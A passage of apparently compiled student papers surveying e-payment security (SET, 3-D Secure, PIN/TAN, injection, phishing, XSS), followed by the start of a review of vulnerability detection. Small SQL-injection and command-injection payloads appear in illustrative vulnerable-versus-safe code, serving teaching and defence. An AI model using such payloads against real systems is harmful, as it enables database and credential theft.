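def h(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()   # SET digests are 160-bit

PI = b"card=4111111111111111;amount=99.90"   # Payment Information
OI = b"order=42;item=book;qty=1"             # Order Information

PIMD = h(PI)                # step 1: digest of the payment info
OIMD = h(OI)                # step 2: digest of the order info
POMD = h(PIMD + OIMD)       # step 3: combined digest (this is what gets signed)

# The merchant receives (OI, PIMD) -- never PI itself -- yet can still
# verify that the signed POMD covers this particular order:
merchant_POMD = h(PIMD + h(OI))
assert merchant_POMD == POMD

# The payment gateway receives (PI, OIMD) and verifies symmetrically:
gateway_POMD = h(h(PI) + OIMD)
assert gateway_POMD == POMD
```

Each party can link its half of the transaction to the single signature without ever seeing the other half in the clear.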
SET has advantages with respect to, but also gaps in, the following requirements:

Confidentiality - payment information is secured, but order information is not.
Data Integrity - mathematical techniques are used to minimize corruption and detect
malicious tampering.
Client Authentication - a Digital ID (certificate) is used to identify the customer,
and the Digital ID is checked via the card’s issuer.
Merchant Authentication - a digital certificate is again used as a back-check to
confirm that the merchant is valid.
SET can work in real time or as a store-and-forward transfer, and it is backed by
the major credit card companies and banks. Its transactions can be accomplished over
the Web or via e-mail. It provides confidentiality, integrity, authentication and
non-repudiation. SET is a very comprehensive, and very complicated, security
protocol; it is the main protocol for ensuring privacy and security during credit
card payment.
3-D Secure There exists another, relatively new, security protocol called “3-D
Secure”. It was developed by Visa (under the product name Verified by Visa), the
leading company in handling electronic transactions. 3-D Secure is based on the XML
format and is used as an additional security layer for credit and debit card
transactions. Not long after, the protocol was adopted by MasterCard and American
Express, under the names MasterCard SecureCode and SafeKey respectively.
3-D Secure combines an online authentication process with SSL to protect credit card
information during transmission. 3-D Secure is based on a three-domain model [2]:

1. Acquirer Domain
2. Issuer Domain
3. Interoperability Domain

The protocol uses XML messages sent over an SSL connection with client
authentication, which ensures that both sides (server and client) are authenticated.
3-D Secure initiates a redirection to the bank that issued the client’s card to
authorize the transaction. In this way, the bank takes on the responsibility of
ensuring a secure transaction. Both the merchant and the cardholder benefit in their
own way:

1. Merchants get a reduction in “unauthorized transaction” chargebacks.
2. Cardholders benefit from a decreased risk of other people being able to use their
   payment cards fraudulently on the Internet.
The 3-D Secure card-issuing bank, or its Access Control Server (ACS), asks the buyer
for a password that only the buyer and the bank know, ensuring that the merchant
never learns the password. This method decreases the risk in two ways:

1. Card details are not useful for purchasing without the additional password, and
   the password is not stored or written on the card.
2. Hackers cannot use credit/debit card information obtained from merchants, since
   no password information is ever given to merchants; there is no way for hackers
   to get the password from them.
This is how 3-D Secure works: when an electronic transaction occurs on a 3-D Secure
website and the cardholder is paying with a credit/debit card enrolled in 3-D
Secure, the MasterCard or VISA pop-up or inline-frame security screen appears. The
user is then asked to enter his or her password (which can be a combination of
letters and numbers), known only to him or her. MasterCard or VISA then returns the
user to the electronic commerce store after authentication.
2.2 Online banking
Today, many banks are Internet-only banks. Single-password authentication, as used
on most secure Internet shopping sites, is considered insecure for personal online
banking applications in most countries. To make online banking as secure as
possible, two different security methods exist:

• PIN/TAN: a Personal Identification Number (PIN), a single password used for
  logging in, together with one-time passwords (TANs) used to authenticate
  transactions.
• Signature-based online banking, where all transactions are signed and encrypted
  digitally. The keys for signature generation and encryption can be stored on
  smart cards, thumb drives or any memory medium, depending on the concrete
  implementation.
Since the PIN is an easy-to-understand security measure, we will examine the
one-time password (TAN). The TAN is a second layer of security above and beyond
traditional single-password authentication. TANs provide additional security by
acting as a second factor: if a hacker manages to get the PIN, he or she will not be
able to perform any operations without also knowing a valid TAN. TANs are mostly
distributed in two ways:

1. Sending the online banking user’s TANs by post.
2. Sending the online banking user’s TAN via SMS to the user’s (GSM) mobile phone.

The second way of obtaining TANs is considered the more secure one, since the user
receives an SMS quoting the TAN together with the transaction amount and details;
in this case, the TAN is valid only for a short period of time. The most secure way
of using TANs is to generate them on demand using a security token. These
token-generated TANs depend on the time and on a unique secret stored in the
security token (two-factor authentication, or 2FA).
Another security measure that all online banking websites use is Secure Sockets
Layer (SSL) secured connections. The SSL protocol allows client/server applications
to communicate across a network in a way designed to prevent eavesdropping and
tampering. SSL encrypts the segments of network connections above the transport
layer, using asymmetric cryptography for privacy and a keyed message authentication
code for message reliability. Most online banking websites use Hypertext Transfer
Protocol Secure (HTTPS) on port 443. HTTPS is the combination of Hypertext Transfer
Protocol (HTTP) and SSL/TLS. If we examine packets sent and received under both
HTTPS and HTTP, we can see that messages in HTTPS are encrypted and are of no use to
hackers who obtain them.

From the picture above we can see that everything in the HTTPS message is encrypted,
including the headers and the request/response payload. From the information in the
picture, an attacker can only learn that a connection is taking place between the
two parties already known to him, the domain name and the IP addresses.
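As a sketch of the client side, Python's standard ssl module shows what such a connection involves; by default the context refuses to proceed unless the server's certificate chain verifies and matches the hostname (the https_get helper below is illustrative only):

```python
import socket, ssl

# A default client context verifies the server's certificate chain and checks
# that the certificate matches the hostname -- this is what stops an attacker
# from simply substituting his own public key for the server's.
ctx = ssl.create_default_context()
print(ctx.verify_mode == ssl.CERT_REQUIRED)   # True
print(ctx.check_hostname)                     # True

def https_get(host: str, path: str = "/") -> bytes:
    """Fetch a page over HTTPS; raises if the certificate does not verify."""
    with socket.create_connection((host, 443)) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            chunks = []
            while (chunk := tls.recv(4096)):
                chunks.append(chunk)
            return b"".join(chunks)
```

Everything written through the wrapped socket, headers included, is encrypted on the wire; an eavesdropper sees only the endpoints of the connection.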
3 Threats Faced by E-Transaction Systems
SQL Injection SQL injection is a common vulnerability resulting from lax input
validation. It is an attack on the site itself, in particular its database. The
attacker takes advantage of the fact that programmers often chain together SQL
commands with user-provided parameters, and can therefore embed SQL commands inside
these parameters. As a result, attackers can retrieve, modify or even delete data
from the database [3]. This eventually exposes sensitive data of the particular
company to the attacker, including customers’ credit card numbers, account passwords
etc. Recently, a mass SQL injection attack, which relied on sloppy
misconfigurations of website servers and back-end databases, hit more than 1 million
ASP.NET web pages. Hence, it is extremely important for organizations to pay
attention to this particular problem to prevent it from happening. Some common
prevention measures include looking for SQL signatures in the incoming HTTP stream,
observing the SQL communication and building a profile of all allowed SQL queries,
and monitoring a user’s activity over time to correlate anomalies generated by the
same user.

E.g. http://www.mydomain.com/products/products.asp?productid=123 UNION
SELECT user-name, password FROM USERS
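A minimal sketch of the attack and of the standard defence (parameterized queries), using an in-memory SQLite table with made-up rows:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret1'), ('bob', 'secret2')")

evil = "' OR '1'='1"   # classic tautology payload

# Vulnerable: user input concatenated straight into the SQL string.
unsafe = conn.execute(
    "SELECT name FROM users WHERE name = '%s'" % evil).fetchall()
print(unsafe)   # [('alice',), ('bob',)] -- every row leaked

# Safe: the value is bound as a parameter and never parsed as SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (evil,)).fetchall()
print(safe)     # [] -- no user is literally named "' OR '1'='1"
```

The bound parameter reaches the database engine as data, so the metacharacters in the payload lose their meaning entirely.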
Price Manipulation This particular vulnerability is unique to online shopping carts
and payment gateways. Its cause is that the total payable price is often stored in a
dynamically generated web page, and as such, an attacker can easily modify the
amount using a web application proxy. Figure 2 shows how the final payable price can
be manipulated by the attacker before the information is sent to the payment
gateway. Vulnerabilities of a similar kind have also been found when this
information is stored in client-side cookies, which can easily be accessed and
modified.

Figure 2: Demonstration of Price Manipulation [4].
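One common mitigation (our suggestion, not taken from the attack description above) is never to trust a client-supplied price at all; if price data must round-trip through the client, it can be authenticated with a server-side HMAC. A sketch with made-up values:

```python
import hashlib, hmac

SERVER_KEY = b"server-side secret"   # never sent to the client

def sign_price(order_id: str, price: str) -> str:
    """Tag the price so the server can detect client-side tampering."""
    return hmac.new(SERVER_KEY, f"{order_id}:{price}".encode(),
                    hashlib.sha256).hexdigest()

def verify_price(order_id: str, price: str, tag: str) -> bool:
    return hmac.compare_digest(sign_price(order_id, price), tag)

tag = sign_price("42", "899.00")           # embedded in the form beside the price
print(verify_price("42", "899.00", tag))   # True  -- field untouched
print(verify_price("42", "1.00", tag))     # False -- attacker lowered the price
```

Without the server-side key, the attacker cannot produce a valid tag for the altered amount, so the tampering is caught before the payment gateway is contacted.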
Buffer Overflow The overall goal of a buffer overflow attack is to subvert the
function of a privileged program so that the attacker can take control of that
program; if the program is sufficiently privileged, the attacker can control the
host. A buffer overflow occurs when a program or process tries to store more data in
a buffer than it was intended to hold. As a result, the extra information may
overflow into adjacent buffers, corrupting or overwriting the valid data held in
them. This, in turn, has become a vulnerability that attackers are able to exploit.
In the extra data written to the buffer, attackers embed code designed to trigger
specific actions, sending new instructions to the attacked computer that can allow
the attacker to damage the user’s files, change data or even disclose confidential
information. The problem is commonly associated with programming languages such as C
and C++, which provide no built-in protection against accessing or overwriting data
in any part of memory and do not check that data written to an array stays within
the boundaries of that array. Therefore, manual bounds checking by the programmer is
often required to prevent buffer overflow attacks. A buffer overflow attack can be
either a stack-based exploitation, which targets the call stack, or a heap-based
exploitation, where the overflow occurs in the heap data area. Besides the manual
bounds checking mentioned above, other countermeasures include writing secure code,
stack execution invalidation, relying on the help of a compiler with built-in
safeguards that try to prevent the use of illegal addresses, and dynamic run-time
checks that rely on safety code being preloaded before an application is executed.
Remote Command Execution This vulnerability occurs when an attacker is allowed to
execute operating system commands due to inadequate input validation. It is commonly
found with the use of system calls in Perl and PHP scripts. Problems arise when
script writers assume that users will input data to their CGI program in the correct
format; when a user supplies special meta-characters such as “;” or “|” in the input
data, these characters may make the script do things other than what it was
originally intended to do. Successful exploitation of the vulnerability may give the
attacker the ability to execute arbitrary commands with the elevated privileges of
the web server.
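The difference between passing user input through a shell and passing it as a literal argument can be sketched as follows (the vulnerable case assumes a POSIX shell; the injected payload is made up):

```python
import subprocess

user_input = "report.txt; echo INJECTED"   # attacker-supplied "filename"

# Vulnerable: the string is handed to a shell, so ";" starts a second command.
unsafe = subprocess.run("echo " + user_input, shell=True,
                        capture_output=True, text=True)
print(unsafe.stdout)   # the injected command actually ran

# Safer: an argument list with no shell -- metacharacters stay literal data.
safe = subprocess.run(["echo", user_input], capture_output=True, text=True)
print(safe.stdout)     # 'report.txt; echo INJECTED' printed as plain text
```

Avoiding the shell entirely (and validating input against an allow-list besides) removes the interpreter that gives “;” and “|” their special meaning.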
Weak Authentication and Authorization An attacker can use tools to attack
authentication systems that do not prohibit multiple failed log-ins, or websites
that use HTTP Basic Authentication or pass session IDs outside of Secure Sockets
Layer. Brute-force methods can be applied if the algorithm involved is simple: one
can write a Perl script to enumerate the possible session ID space and break the
application’s authentication and authorization schemes.
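Two corresponding defences can be sketched: session IDs drawn from a cryptographically secure random source, so the ID space cannot be enumerated, and a simple failed-login lockout. The threshold and helper names below are illustrative:

```python
import secrets

def new_session_id() -> str:
    """256-bit random session ID from a CSPRNG -- infeasible to enumerate."""
    return secrets.token_urlsafe(32)

# A minimal lockout after repeated failed log-ins, the other weakness above.
MAX_ATTEMPTS = 5
failed = {}

def check_login(user: str, ok: bool) -> str:
    if failed.get(user, 0) >= MAX_ATTEMPTS:
        return "locked"
    if ok:
        failed[user] = 0
        return new_session_id()
    failed[user] = failed.get(user, 0) + 1
    return "denied"

print(check_login("alice", False))   # denied
sid = check_login("alice", True)
print(len(sid) > 40)                 # True: token_urlsafe(32) is ~43 chars
```

With 256 bits of randomness, an enumeration script of the kind described above has no realistic chance of guessing a live session ID, and the lockout caps brute-force attempts against any single account.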
Phishing Phishing is pronounced the same way as fishing, and it is similar to the
popular sport: the fisherman casts a hook baited with fish food, hoping that some
unsuspecting fish will bite. In the case of phishing, the hacker poses as a trusted
source and tries to lure unsuspecting victims to illegitimate websites, where
oblivious users enter their personal information. General Internet users have the
misconception that phishing scams can only be conducted by means of fraudulent
e-mail that redirects users to an illegitimate website, giving them a false sense of
security that they are safe as long as they avoid clicking any links in e-mail.
However, that is not the case: there are many other ways in which phishing scams are
conducted, and it is important to know these techniques to be able to safeguard our
personal information. We will explore a couple of phishing scams that are commonly
used.
Filter Evasion
Conventional phishing scams are done using a combination of text and images.
However, the prevalence of spam filters subjects phishing mail to greater scrutiny:
a spam filter is able to detect text-based phishing content, so such mail is
filtered out of the mailbox. As a result, hackers are turning to the use of images
in place of the text that carries the phishing information, thereby bypassing the
filtering mechanism.
Website forgery
This is the most commonly known form of phishing, in which the hacker creates a fake
website that looks identical to a legitimate website in terms of design, with only a
slight variation in the URL. Identifying a forged website is easy: the user can
compare the URL of the trusted website to that of the suspected website, or use a
web browser that supports anti-phishing measures and alerts the user to known
phishing sites. Unfortunately, while security features have evolved to meet changing
security needs, phishing techniques have also evolved to counter the security
measures in place. Website forgery has evolved: hackers have come up with ingenious
ways to exploit the user’s common perception that a website is safe from forgery as
long as its URL matches that of a legitimate site. This is achieved by means of
JavaScript that runs when the user clicks on a link that redirects them to a
phishing website; the JavaScript suppresses the address bar and replaces it with a
fake address bar, which displays the address of the trusted website rather than the
address of the phishing site [5].
Tabnabbing
This is a term coined by Aza Raskin, creative lead of Firefox, on his blog, where he
demonstrated a proof of concept of this new phishing technique. According to
Raskin, the technique works on the tabbed browsing feature provided by most browsers. It
begins when a user visits a normal-looking website (where the phishing scripts are
going to run) and then, for whatever reason, navigates away from the
current tab to open a few other tabs. During this time, the scripts running on the
phishing site detect inactivity on the page and begin replacing
the site's contents: its favicon, title and appearance change to something the user is familiar
with. Take, for example, a bogus Gmail page requesting login information,
which looks very similar to the legitimate website. When the user browses through
the open tabs he chances upon the familiar Gmail favicon and, since "memory is
malleable and moldable" as Raskin puts it, assumes that he had indeed opened a
Gmail tab and unsuspectingly enters his login information into the phishing site. This
attack can be extended to other forms of web services, most notably social
networking sites, bank websites and e-commerce websites. Furthermore, Raskin stated
that the attack could be customized to detect the web services accessed by the victim and
then generate web pages dynamically to fit the user [6].
Pop-up on legitimate website
This attack targets a vulnerability of JavaScript pop-ups in web browsers whereby
dialog boxes bearing no information about their origin can be opened. The scam
begins with the user clicking on a link in a malicious website or email. The link
directs the user to a legitimate website, after which a pop-up requesting login
information appears as an overlay on the legitimate site. A variation
of this attack, known as in-session phishing, involves malware that injects
malicious code into the browser. The attack begins with the user logging into a legitimate
banking site; the malware detects the web service being accessed and displays a
pop-up claiming that the session has expired, requesting user input to
renew the session. Both of these attacks have a higher rate of success because they
happen on the legitimate website, so users who receive these unauthorized
prompts tend to perceive the request as legitimate.
Evil twin
Evil twins are wireless networks created by phishers to confuse users
by offering access points with the same name as legitimate access points, thereby
creating confusion in the hope of luring unsuspecting users onto the rogue network.
This attack is common in places with wireless hotspots. The phisher
begins by scanning an area for an access point to target, then impersonates that access
point. Unsuspecting users accessing the rogue network are fooled into believing that they
are on the legitimate network and that their transactions are therefore secure; in actual
fact the integrity of their data has been compromised, as the information is routed through
the illegitimate network. The setup of the bogus network is relatively simple and
hard to detect; a phisher can set up an evil twin wireless network using a laptop and
can easily shut the network down when he feels his identity is compromised.
Pharming It is very much similar to phishing; both use bogus websites in an attempt to
steal personal information from their victims. The main difference between the two
methods is that while the majority of phishing scams can be detected by paying
close attention to discrepancies in the web address, pharming is able to redirect
legitimate web traffic to an illegitimate site even when the user inputs the
correct address. Thus, pharming is a lot harder to detect than phishing.
This redirection of web traffic can be achieved by means of Trojans,
worms or viruses capable of attacking the address bar of the web browser, so
that valid addresses of legitimate websites are modified into illegitimate ones. Another
method of redirecting web traffic is DNS poisoning. This attack takes
advantage of the fact that DNS has no means to validate the integrity of data received,
and that DNS data is cached for performance. The hacker corrupts the
DNS server by introducing incorrect entries; these entries spoof the legitimate addresses of
entries in the DNS server and redirect them to a server he controls. As a result, web
requests to legitimate websites are redirected to a bogus website set up by the hacker.
Cross-site scripting Cross-Site Scripting (XSS) is an attack technique targeting web
browsers on the client side; an XSS attack exploits vulnerabilities in web applications
that allow an attacker to inject client-side scripts into users' web browsers. These
scripts, when injected and run in the client browser, are able to carry out malicious
acts: recording keystrokes, stealing history, accessing session cookies and many
others. XSS attacks fall under two main categories, namely persistent
and non-persistent.
Non-persistent
A non-persistent XSS attack begins with the hacker attempting to identify a flaw in a
trusted website that is susceptible to XSS. Once an attack vector has been
identified, the hacker scripts an attack to exploit the vulnerability of the
identified vector. The completed script is inserted into a specially crafted link. This
seemingly harmless link contains a URL that points to the trusted website,
along with the malicious script that will run in the client browser when clicked. The
hacker then begins spreading the crafted link through websites, forums and
email spam. Because the crafted link points to the trusted website, it is
likely to deceive even experienced users into accessing the link with no knowledge
that an attack is taking place. Fortunately, non-persistent XSS attacks can be avoided
easily; a general rule of thumb for users accessing sensitive information on the
web is to avoid clicking on unsolicited links and to access trusted web
pages only through well-formed URLs entered by the user.
Persistent
Unlike a non-persistent XSS attack, a persistent XSS attack does not require the
creation of a crafted URL. In this case, the hacker first creates an exploit code,
using Javascript or any other scripting language. The attack code is then submitted
to websites where it can be stored for an extended period of time and accessed
by many visitors; common areas where attack code can be submitted are forums,
wikis, blog comments, user reviews and many other locations [7]. When users access
the "infected" pages containing the exploit code, the code executes
automatically, giving the user no chance to defend against the attack. A persistent
XSS attack is dangerous and hard to defend against. Firstly, hackers are able
to carry out the attack stealthily; for example, the content within a <script> tag
is not displayed on the webpage, so it is difficult for users to detect whether
a particular page is "infected". Secondly, the fact that the exploit code is stored on the
server means that it can exist indefinitely until removed, giving it a
greater chance of infecting users. The situation is worsened by the fact that websites with
high traffic are the usual targets of persistent XSS attacks, allowing them to infect
many users in a relatively short amount of time.
4
Analysis of Current Systems
SET Protocol Despite the undisputed recognition of SET's importance in e-commerce security, there are still defects in the current protocol. Firstly, the
SET protocol does not specify how to preserve or destroy the data after every
transaction, or determine where the data should be saved. As a result, this may become a
vulnerability that a hacker can simply attack. Besides that, it also does not resolve
disputes between the parties involved, namely the cardholder, merchant, issuer, acquirer,
payment gateway and certification centre. Hence, whenever there is a dispute,
SET has no rule to help resolve the situation. The problem is further
highlighted by the lack of time information in the current protocol, as it does not
record the time at which transactions are processed. This particular information
can be useful whenever there are disputes, as it can provide legal evidence. Last but
not least, there is also the concern of using weak 56-bit DES due to the
computational cost of asymmetric encryption (IBM, 1998).
Hence, there have been several suggestions to improve the
current protocol. First and foremost, a data destruction mechanism can be included
in the protocol to ensure that sensitive data is destroyed
after the transaction, with only a copy saved on a storage server for further
reference. This would ensure that the data cannot be found on the computers
of the parties involved, but is accessible only through the storage server. In addition, this
mechanism can also be used to record other useful information, such as the
transaction time, which may be useful to the different parties as mentioned above. (The
Improvement of SET Protocol based on Security Mobile Payment, 2011)
PIN/TAN System The PIN/TAN system is an authentication scheme that is widely
used in the e-commerce world nowadays, especially in internet
banking. Some banks have even taken a step further by providing users with a TAN
generator token, which reduces the risk of the entire TAN list being compromised.
However, this does not change the fact that the PIN/TAN system is
inherently insecure, as brought out by several students from a university in Germany
(Outflanking and securely using the PIN/TAN system). It has been shown that one
does not need any special hacking skills, only some experience
with online banking and some basic programming knowledge, to perform the attack.
Basically, the attack requires the attacker to infect the target's system with a computer
virus or a Trojan containing a spy that lurks hidden in the background and eavesdrops
on the computer's hardware input (keyboard and mouse) to obtain the required
information: the account number, the PIN and finally the TAN. Once all
this sensitive data has been acquired, the spy closes the web browser before the
TAN is sent to the bank's server, ensuring that the TAN stays valid; finally, the
attacker can use the stolen information to transfer money from the target's
account. This attack is made possible for several reasons. One of them is the
fact that the sensitive data is typed in clear text into the computer, which
allows the attacker to acquire valid authentication data just by stealing the target's
input. Besides that, the PIN/TAN system is not immune to common internet threats
such as phishing.
3-D Secure 3-D Secure is designed as an extra layer of security for online transactions
involving debit and credit cards. Despite all the security claims made by Visa,
the developer of the protocol, it has several well-known flaws which have caused it to
come under attack on numerous occasions. Nevertheless, it is probably the largest
single sign-on system ever deployed. Its first, and perhaps most fatal, weakness is
none other than the 3DS form, which is an iframe or pop-up without an address bar.
As such, a customer is unable to verify where the form has come from. This
goes against the advice given to the public on how to prevent phishing attacks and
also makes attacks against 3DS (e.g. man-in-the-middle attacks) easier. Its second
weakness is the activation during shopping (ADS) mechanism, in which customers are
requested to fill in an ADS form to verify that they are the authorized cardholder. As a
result, it is easy for an attacker to impersonate the ADS form and request all
this sensitive data from the customer, while from the customer's perspective it is
merely an online shopping website asking for personal details. Besides that, there is
also a mechanism that helps the customer verify that he is talking to the actual
bank, by displaying a phrase he chose during the ADS process. However,
this particular mechanism makes 3DS even more vulnerable to an MITM
attack. (Verified by Visa and MasterCard SecureCode: or, How Not to Design
Authentication)
5
Different Ways to Pay Online
Disposable Credit Cards Disposable credit cards have been around for quite some time,
but many are still unaware of their existence. American Express was the first bank to
introduce them, in September 2000 [8]. Subsequently, many other banks have also offered
disposable credit cards, yet they are not widely known or utilized. These
disposable credit cards can be applied for at any bank that offers them, and a
customer can apply for a number of these cards under one credit card account.
These disposable cards can then be used with different merchants for e-transactions.
The main idea behind disposable credit cards is that they function as
aliases for your original credit card, such that in the event one of the disposable
cards is compromised, the hacker gains no knowledge of your
original card number. Disposable credit cards seem a plausible choice for securing
e-transactions, yet they are not widely used. One of the reasons could be the
administrative procedures involved in maintaining these cards; they need to be renewed
on an annual basis, and when we take into consideration that a user could
own a number of them, the trouble involved in maintaining the cards offsets the
benefits they provide.
Prepaid Credit Cards A prepaid credit card is similar to any other prepaid card,
allowing the user to make purchases using a sum of money pre-loaded onto the card. There
are two forms of prepaid credit card, "reloadable" and "non-reloadable";
the former allows the user to add funds to the card's balance while the
latter does not. Prepaid credit cards can be purchased without a bank
account or credit card, and users are able to make purchases using the value stored in
the card, which functions the same way as an actual credit card (except that it
does not provide purchases on credit). This method of payment minimizes the loss
incurred by the user in the event that the card number is compromised.
Furthermore, Visa's zero-liability policy, which protects users from unauthorized
charges on their cards, also applies to prepaid cards. An interesting point to
note is the underlying cost associated with the use of these cards, which
includes the cost of adding value to the card (reloadable cards) and the cost of the
card itself (non-reloadable cards) [9].
MasterCard SecureCode SecureCode is a service provided by MasterCard to
improve e-transaction security; it seeks to protect against the unauthorized use of
credit cards at participating online retailers [10]. All MasterCard holders can
register their existing credit or debit card for this service and receive their SecureCode
upon completion. When a user confirms a purchase on an e-commerce site that
offers this service, he is prompted to input his SecureCode; this code is
unique to the user and serves to verify the user's identity before allowing the
transaction to take place. An additional feature of SecureCode is that it acts as a
medium between the customer and the retailer, meaning that the customer's credit card number
is not revealed to the merchant during the transaction. However, SecureCode has its
limitations; it applies only to participating online retailers that have opted to
implement SecureCode in their transaction systems. Thus, users' choices are limited to
the list of participating merchants, and the coverage of this service will remain
limited unless more retailers decide to implement SecureCode.
Online Payment Services Online payment services such as Google
Checkout (checkout.google.com) and Amazon Payments (payments.amazon.com) are
web services that handle transactions between customers and online retailers.
One might question the necessity of having these middleman websites handle
transactions when this could already be done on the retailer's website. It is true to some
extent that these sites do seem merely to handle transactions, but we must also
take note of the underlying security features they offer that can better protect
our credit card information. When users sign up for any of these payment
services, they must first have a certain level of trust in the reliability of the web
service in securing their data. By entrusting the sites with personal information, the
users leverage the expertise and security technologies implemented on these sites
to carry out secure transactions; to put it another way, there
is a shift of security responsibility from the users to the payment website. Transactions
carried out using a payment website are safer in the sense that users' credit card
information is not exposed to the merchants during the payment process, so the
confidentiality of the credit card numbers is preserved. However, we must also be
aware that by using these websites, we are assuming that the owners of
the services are protecting our personal information to the best of their ability, which
might not be the case.
6
Conclusion
Electronic transactions have become an integral part of the commerce system
nowadays. Banking institutions and companies worldwide have jumped on the
wagon in the hope of reaping huge financial benefits from the current systems. As a
result, the security of such systems has become more of a concern to the different
parties involved. However, we observe that no existing system can be
considered fully secure. All these systems and protocols have their own strengths and
weaknesses. Many companies have been making proactive efforts to
develop better and more secure systems, so improved systems and protocols
can be expected in the future.
7
References
1. Atul Kahate: Security and Threat models – Secure Electronic Transaction Protocol
(2008)
http://www.indicthreads.com/1496/security-and-threat-models-secure-electronic-transaction-set-protocol/
2. 3-D Secure
http://www.web-merchant.co.uk/optimal%20technical%20data/3D_secure_Guide.pdf
3. SQL Injection
http://dev.mysql.com/tech-resources/articles/guide-to-php-security-ch3.pdf
4. Common Security Vulnerabilities in E-Commerce System
http://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems
5. British Broadcasting Corporation (BBC): Phishing con hijacks browser bar (2004).
http://news.bbc.co.uk/2/hi/technology/3608943.stm
6. Raskin, A.: Tabnabbing: A New Type of Phishing Attack (2010),
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
7. Fogie, S., Grossman, J., Hansen, R., Rager, A., & Petkov, P.:
XSS Attacks (2007). pp. 75,
http://books.google.com/books?id=dPhqDe0WHZ8C&hl=en
8. Linsey, R.: Disposable Credit Card Numbers (2001).
http://www.cardratings.com/feb01new.html
9. White, M.C.: Credit Cards for Kids? Don’t Be Childish
(2011). http://moneyland.time.com/2011/10/25/why-parents-shouldnt-give-their-kids-a-credit-card/
10. MasterCard: Support SecureCode™ FAQs.
http://www.mastercard.us/support/securecode.html
11. Secure Electronic Transactions (SET).
http://searchfinancialsecurity.techtarget.com/definition/Secure-Electronic-Transaction
12. Electronic Transaction.
http://netlab.cs.iitm.ernet.in/cs648/2009/assignment1/rajan.pdf
13. Ganesh Ramakrishnan: Secure Electronic Transaction (SET) Protocol
http://www.isaca.org/Journal/Past-Issues/2000/Volume-6/Pages/Secure-Electronic-Transaction-SET-Protocol.aspx
14. 3-D Secure
http://www.3dtrust.com/
15. 3-D Secure Integration
http://www.advansys.com/default.asp/p=87/3D_Secure
16. Secure Online Banking
http://www.nationwide.com/secure-online-banking.jsp
17. Buffer Overflow
http://searchsecurity.techtarget.com/definition/buffer-overflow
18. The improvement of SET Protocol based on Security Mobile Payment
http://www.aicit.org/jcit/ppl/03_10.4156jcit.vol6.issue7.3.pdf
19. Analysis of SET and 3-D Secure
http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908626
20. SET Criticism
http://www.wolrath.com/set.html#3.4.1_Delays,%20_delays,_delays_!
21. Improving the Secure Electronic Transaction Protocol by Using Signcryption
http://www.signcryption.org/publications/pdffiles/HanaokaZhengImai-e84a_8_2042.pdf
22. Secure Electronic Transactions: An Overview
http://www.davidreilly.com/topics/electronic_commerce/essays/secure_electronic_transactions.html
A Review of the Techniques Used in Detecting Software
Vulnerabilities
Nicholas Kor, Cheng Du
National University of Singapore
Abstract. This paper reviews a few common methods of detecting software
vulnerabilities and their use in detecting the presence of some of the more
prevalent vulnerabilities. We also survey methods used to mitigate the amount
of damage that can be done by a program.
1
Introduction
Vulnerabilities present in the design of programs allow attackers to reduce the
integrity, assurance and availability of the program through exploitation. Careful
analysis of the program code for vulnerabilities greatly reduces the likelihood of
successful malicious exploitation. This results in a more secure and stable program,
and helps maintain the health of the rest of the system that interacts with it.
In this paper we outline common methods of testing programs for
vulnerabilities and their use in detecting the presence of a few of the more common
vulnerabilities found in software. We also review methods used to prevent
compromised programs from damaging the systems they reside in.
2
Detecting Vulnerabilities in Software
2.1
Code Review
Code review at its simplest is an examination of the code, by the author or someone
else, to find and repair faults, both security-related and otherwise. There are a few
types of code review with varying levels of formality and manpower involved;
describing the different types is outside the scope of this paper. Static code analysers,
which have a section of their own in this paper, are also often used in large projects
to aid in checking for known vulnerabilities.
While checking that the code does what it is supposed to do is obvious and
routine, checking that the code does only what it is supposed to and nothing more is
less so. The additional "and nothing more" requirement ensures that the code is
checked for security as well as functionality1.
Evidence suggests that code review can be more effective than dynamic
testing, which is the testing of software through the execution of test data. For example, the
software engineering researcher Jones2 summarized the data in his large repository of
project information to paint a picture of how reviews and inspections find faults
relative to other discovery activities. Because products vary so wildly in size, the
table below presents the fault discovery rates relative to the number of thousands of
lines of code in the delivered product. The numbers seem to indicate that code
review outstrips all other forms of fault detection in the number of faults found.
Table 1. Faults found during discovery activities.

    Discovery Activity       Faults found (per thousand lines of code)
    Requirements review      2.5
    Design review            5.0
    Code inspection          10.0
    Integration testing      3.0
    Acceptance testing       2.0
Of course, the effectiveness of code review in detecting vulnerabilities depends highly
on the skills of the reviewer. Ideally, the reviewer should possess computer security
expertise in addition to being a competent programmer and familiar with the source
code. However, not all organisations have the luxury of recruiting people with the
needed computer security skills and this may cause the security of the software to be
neglected when the code is reviewed.
2.2
Using Automated Tools
Automated tools can be used to aid the detection of software vulnerabilities. Static
program analysers are able to detect bugs in code, such as the presence of memory
leaks. Lint3 is a classic example of a static analyser used to detect errors in C source
code.
Some static analysers can provide analysis of the program's behaviour, typically its
control flow and data flow, and translate this behaviour into a
representation that can be easily understood by a reviewer. This function is
especially valuable to a reviewer who is not part of, or is new to, the development
team and has no prior knowledge of the code, as it helps him understand the code in a
shorter amount of time.
Other static analysers can also be configured with the express function of
finding software vulnerabilities, such as detecting the use of unsafe and deprecated
library functions.
As with any man-made tool, static analysers are never perfect; even the
better-written ones produce false positives, wrongly reporting acceptable code as
vulnerable, and false negatives, failing to detect vulnerable code, from time to
time, necessitating manual verification of the warnings given. Thus
such automated tools should be used in conjunction with code review and code
testing, and never standalone.
2.3
Negative or Non-Functional Testing
Testing of code is an integral part of the software development process. The code is
usually subjected to different levels of testing, including unit testing where each
module of the code is tested for functionality, integration testing, where the code is
tested after integrating two or more of its component modules, and regression testing,
where code is tested after a version change to ensure that the enhancement of the
system or the fixing of bugs does not introduce new bugs.
Negative testing4, however, involves verifying the stability of the program by
checking the results of providing invalid or malformed data as input. Causing the
program to crash, or triggering an unhandled exception, could indicate the presence of
vulnerabilities. The test data should also be fed in through all of the ways the program
accepts information, be it command line arguments, input boxes or even network packets.
This is in line with the earlier concept of checking that the program only does what it
should and nothing more. In later parts of this paper, we will present examples of how
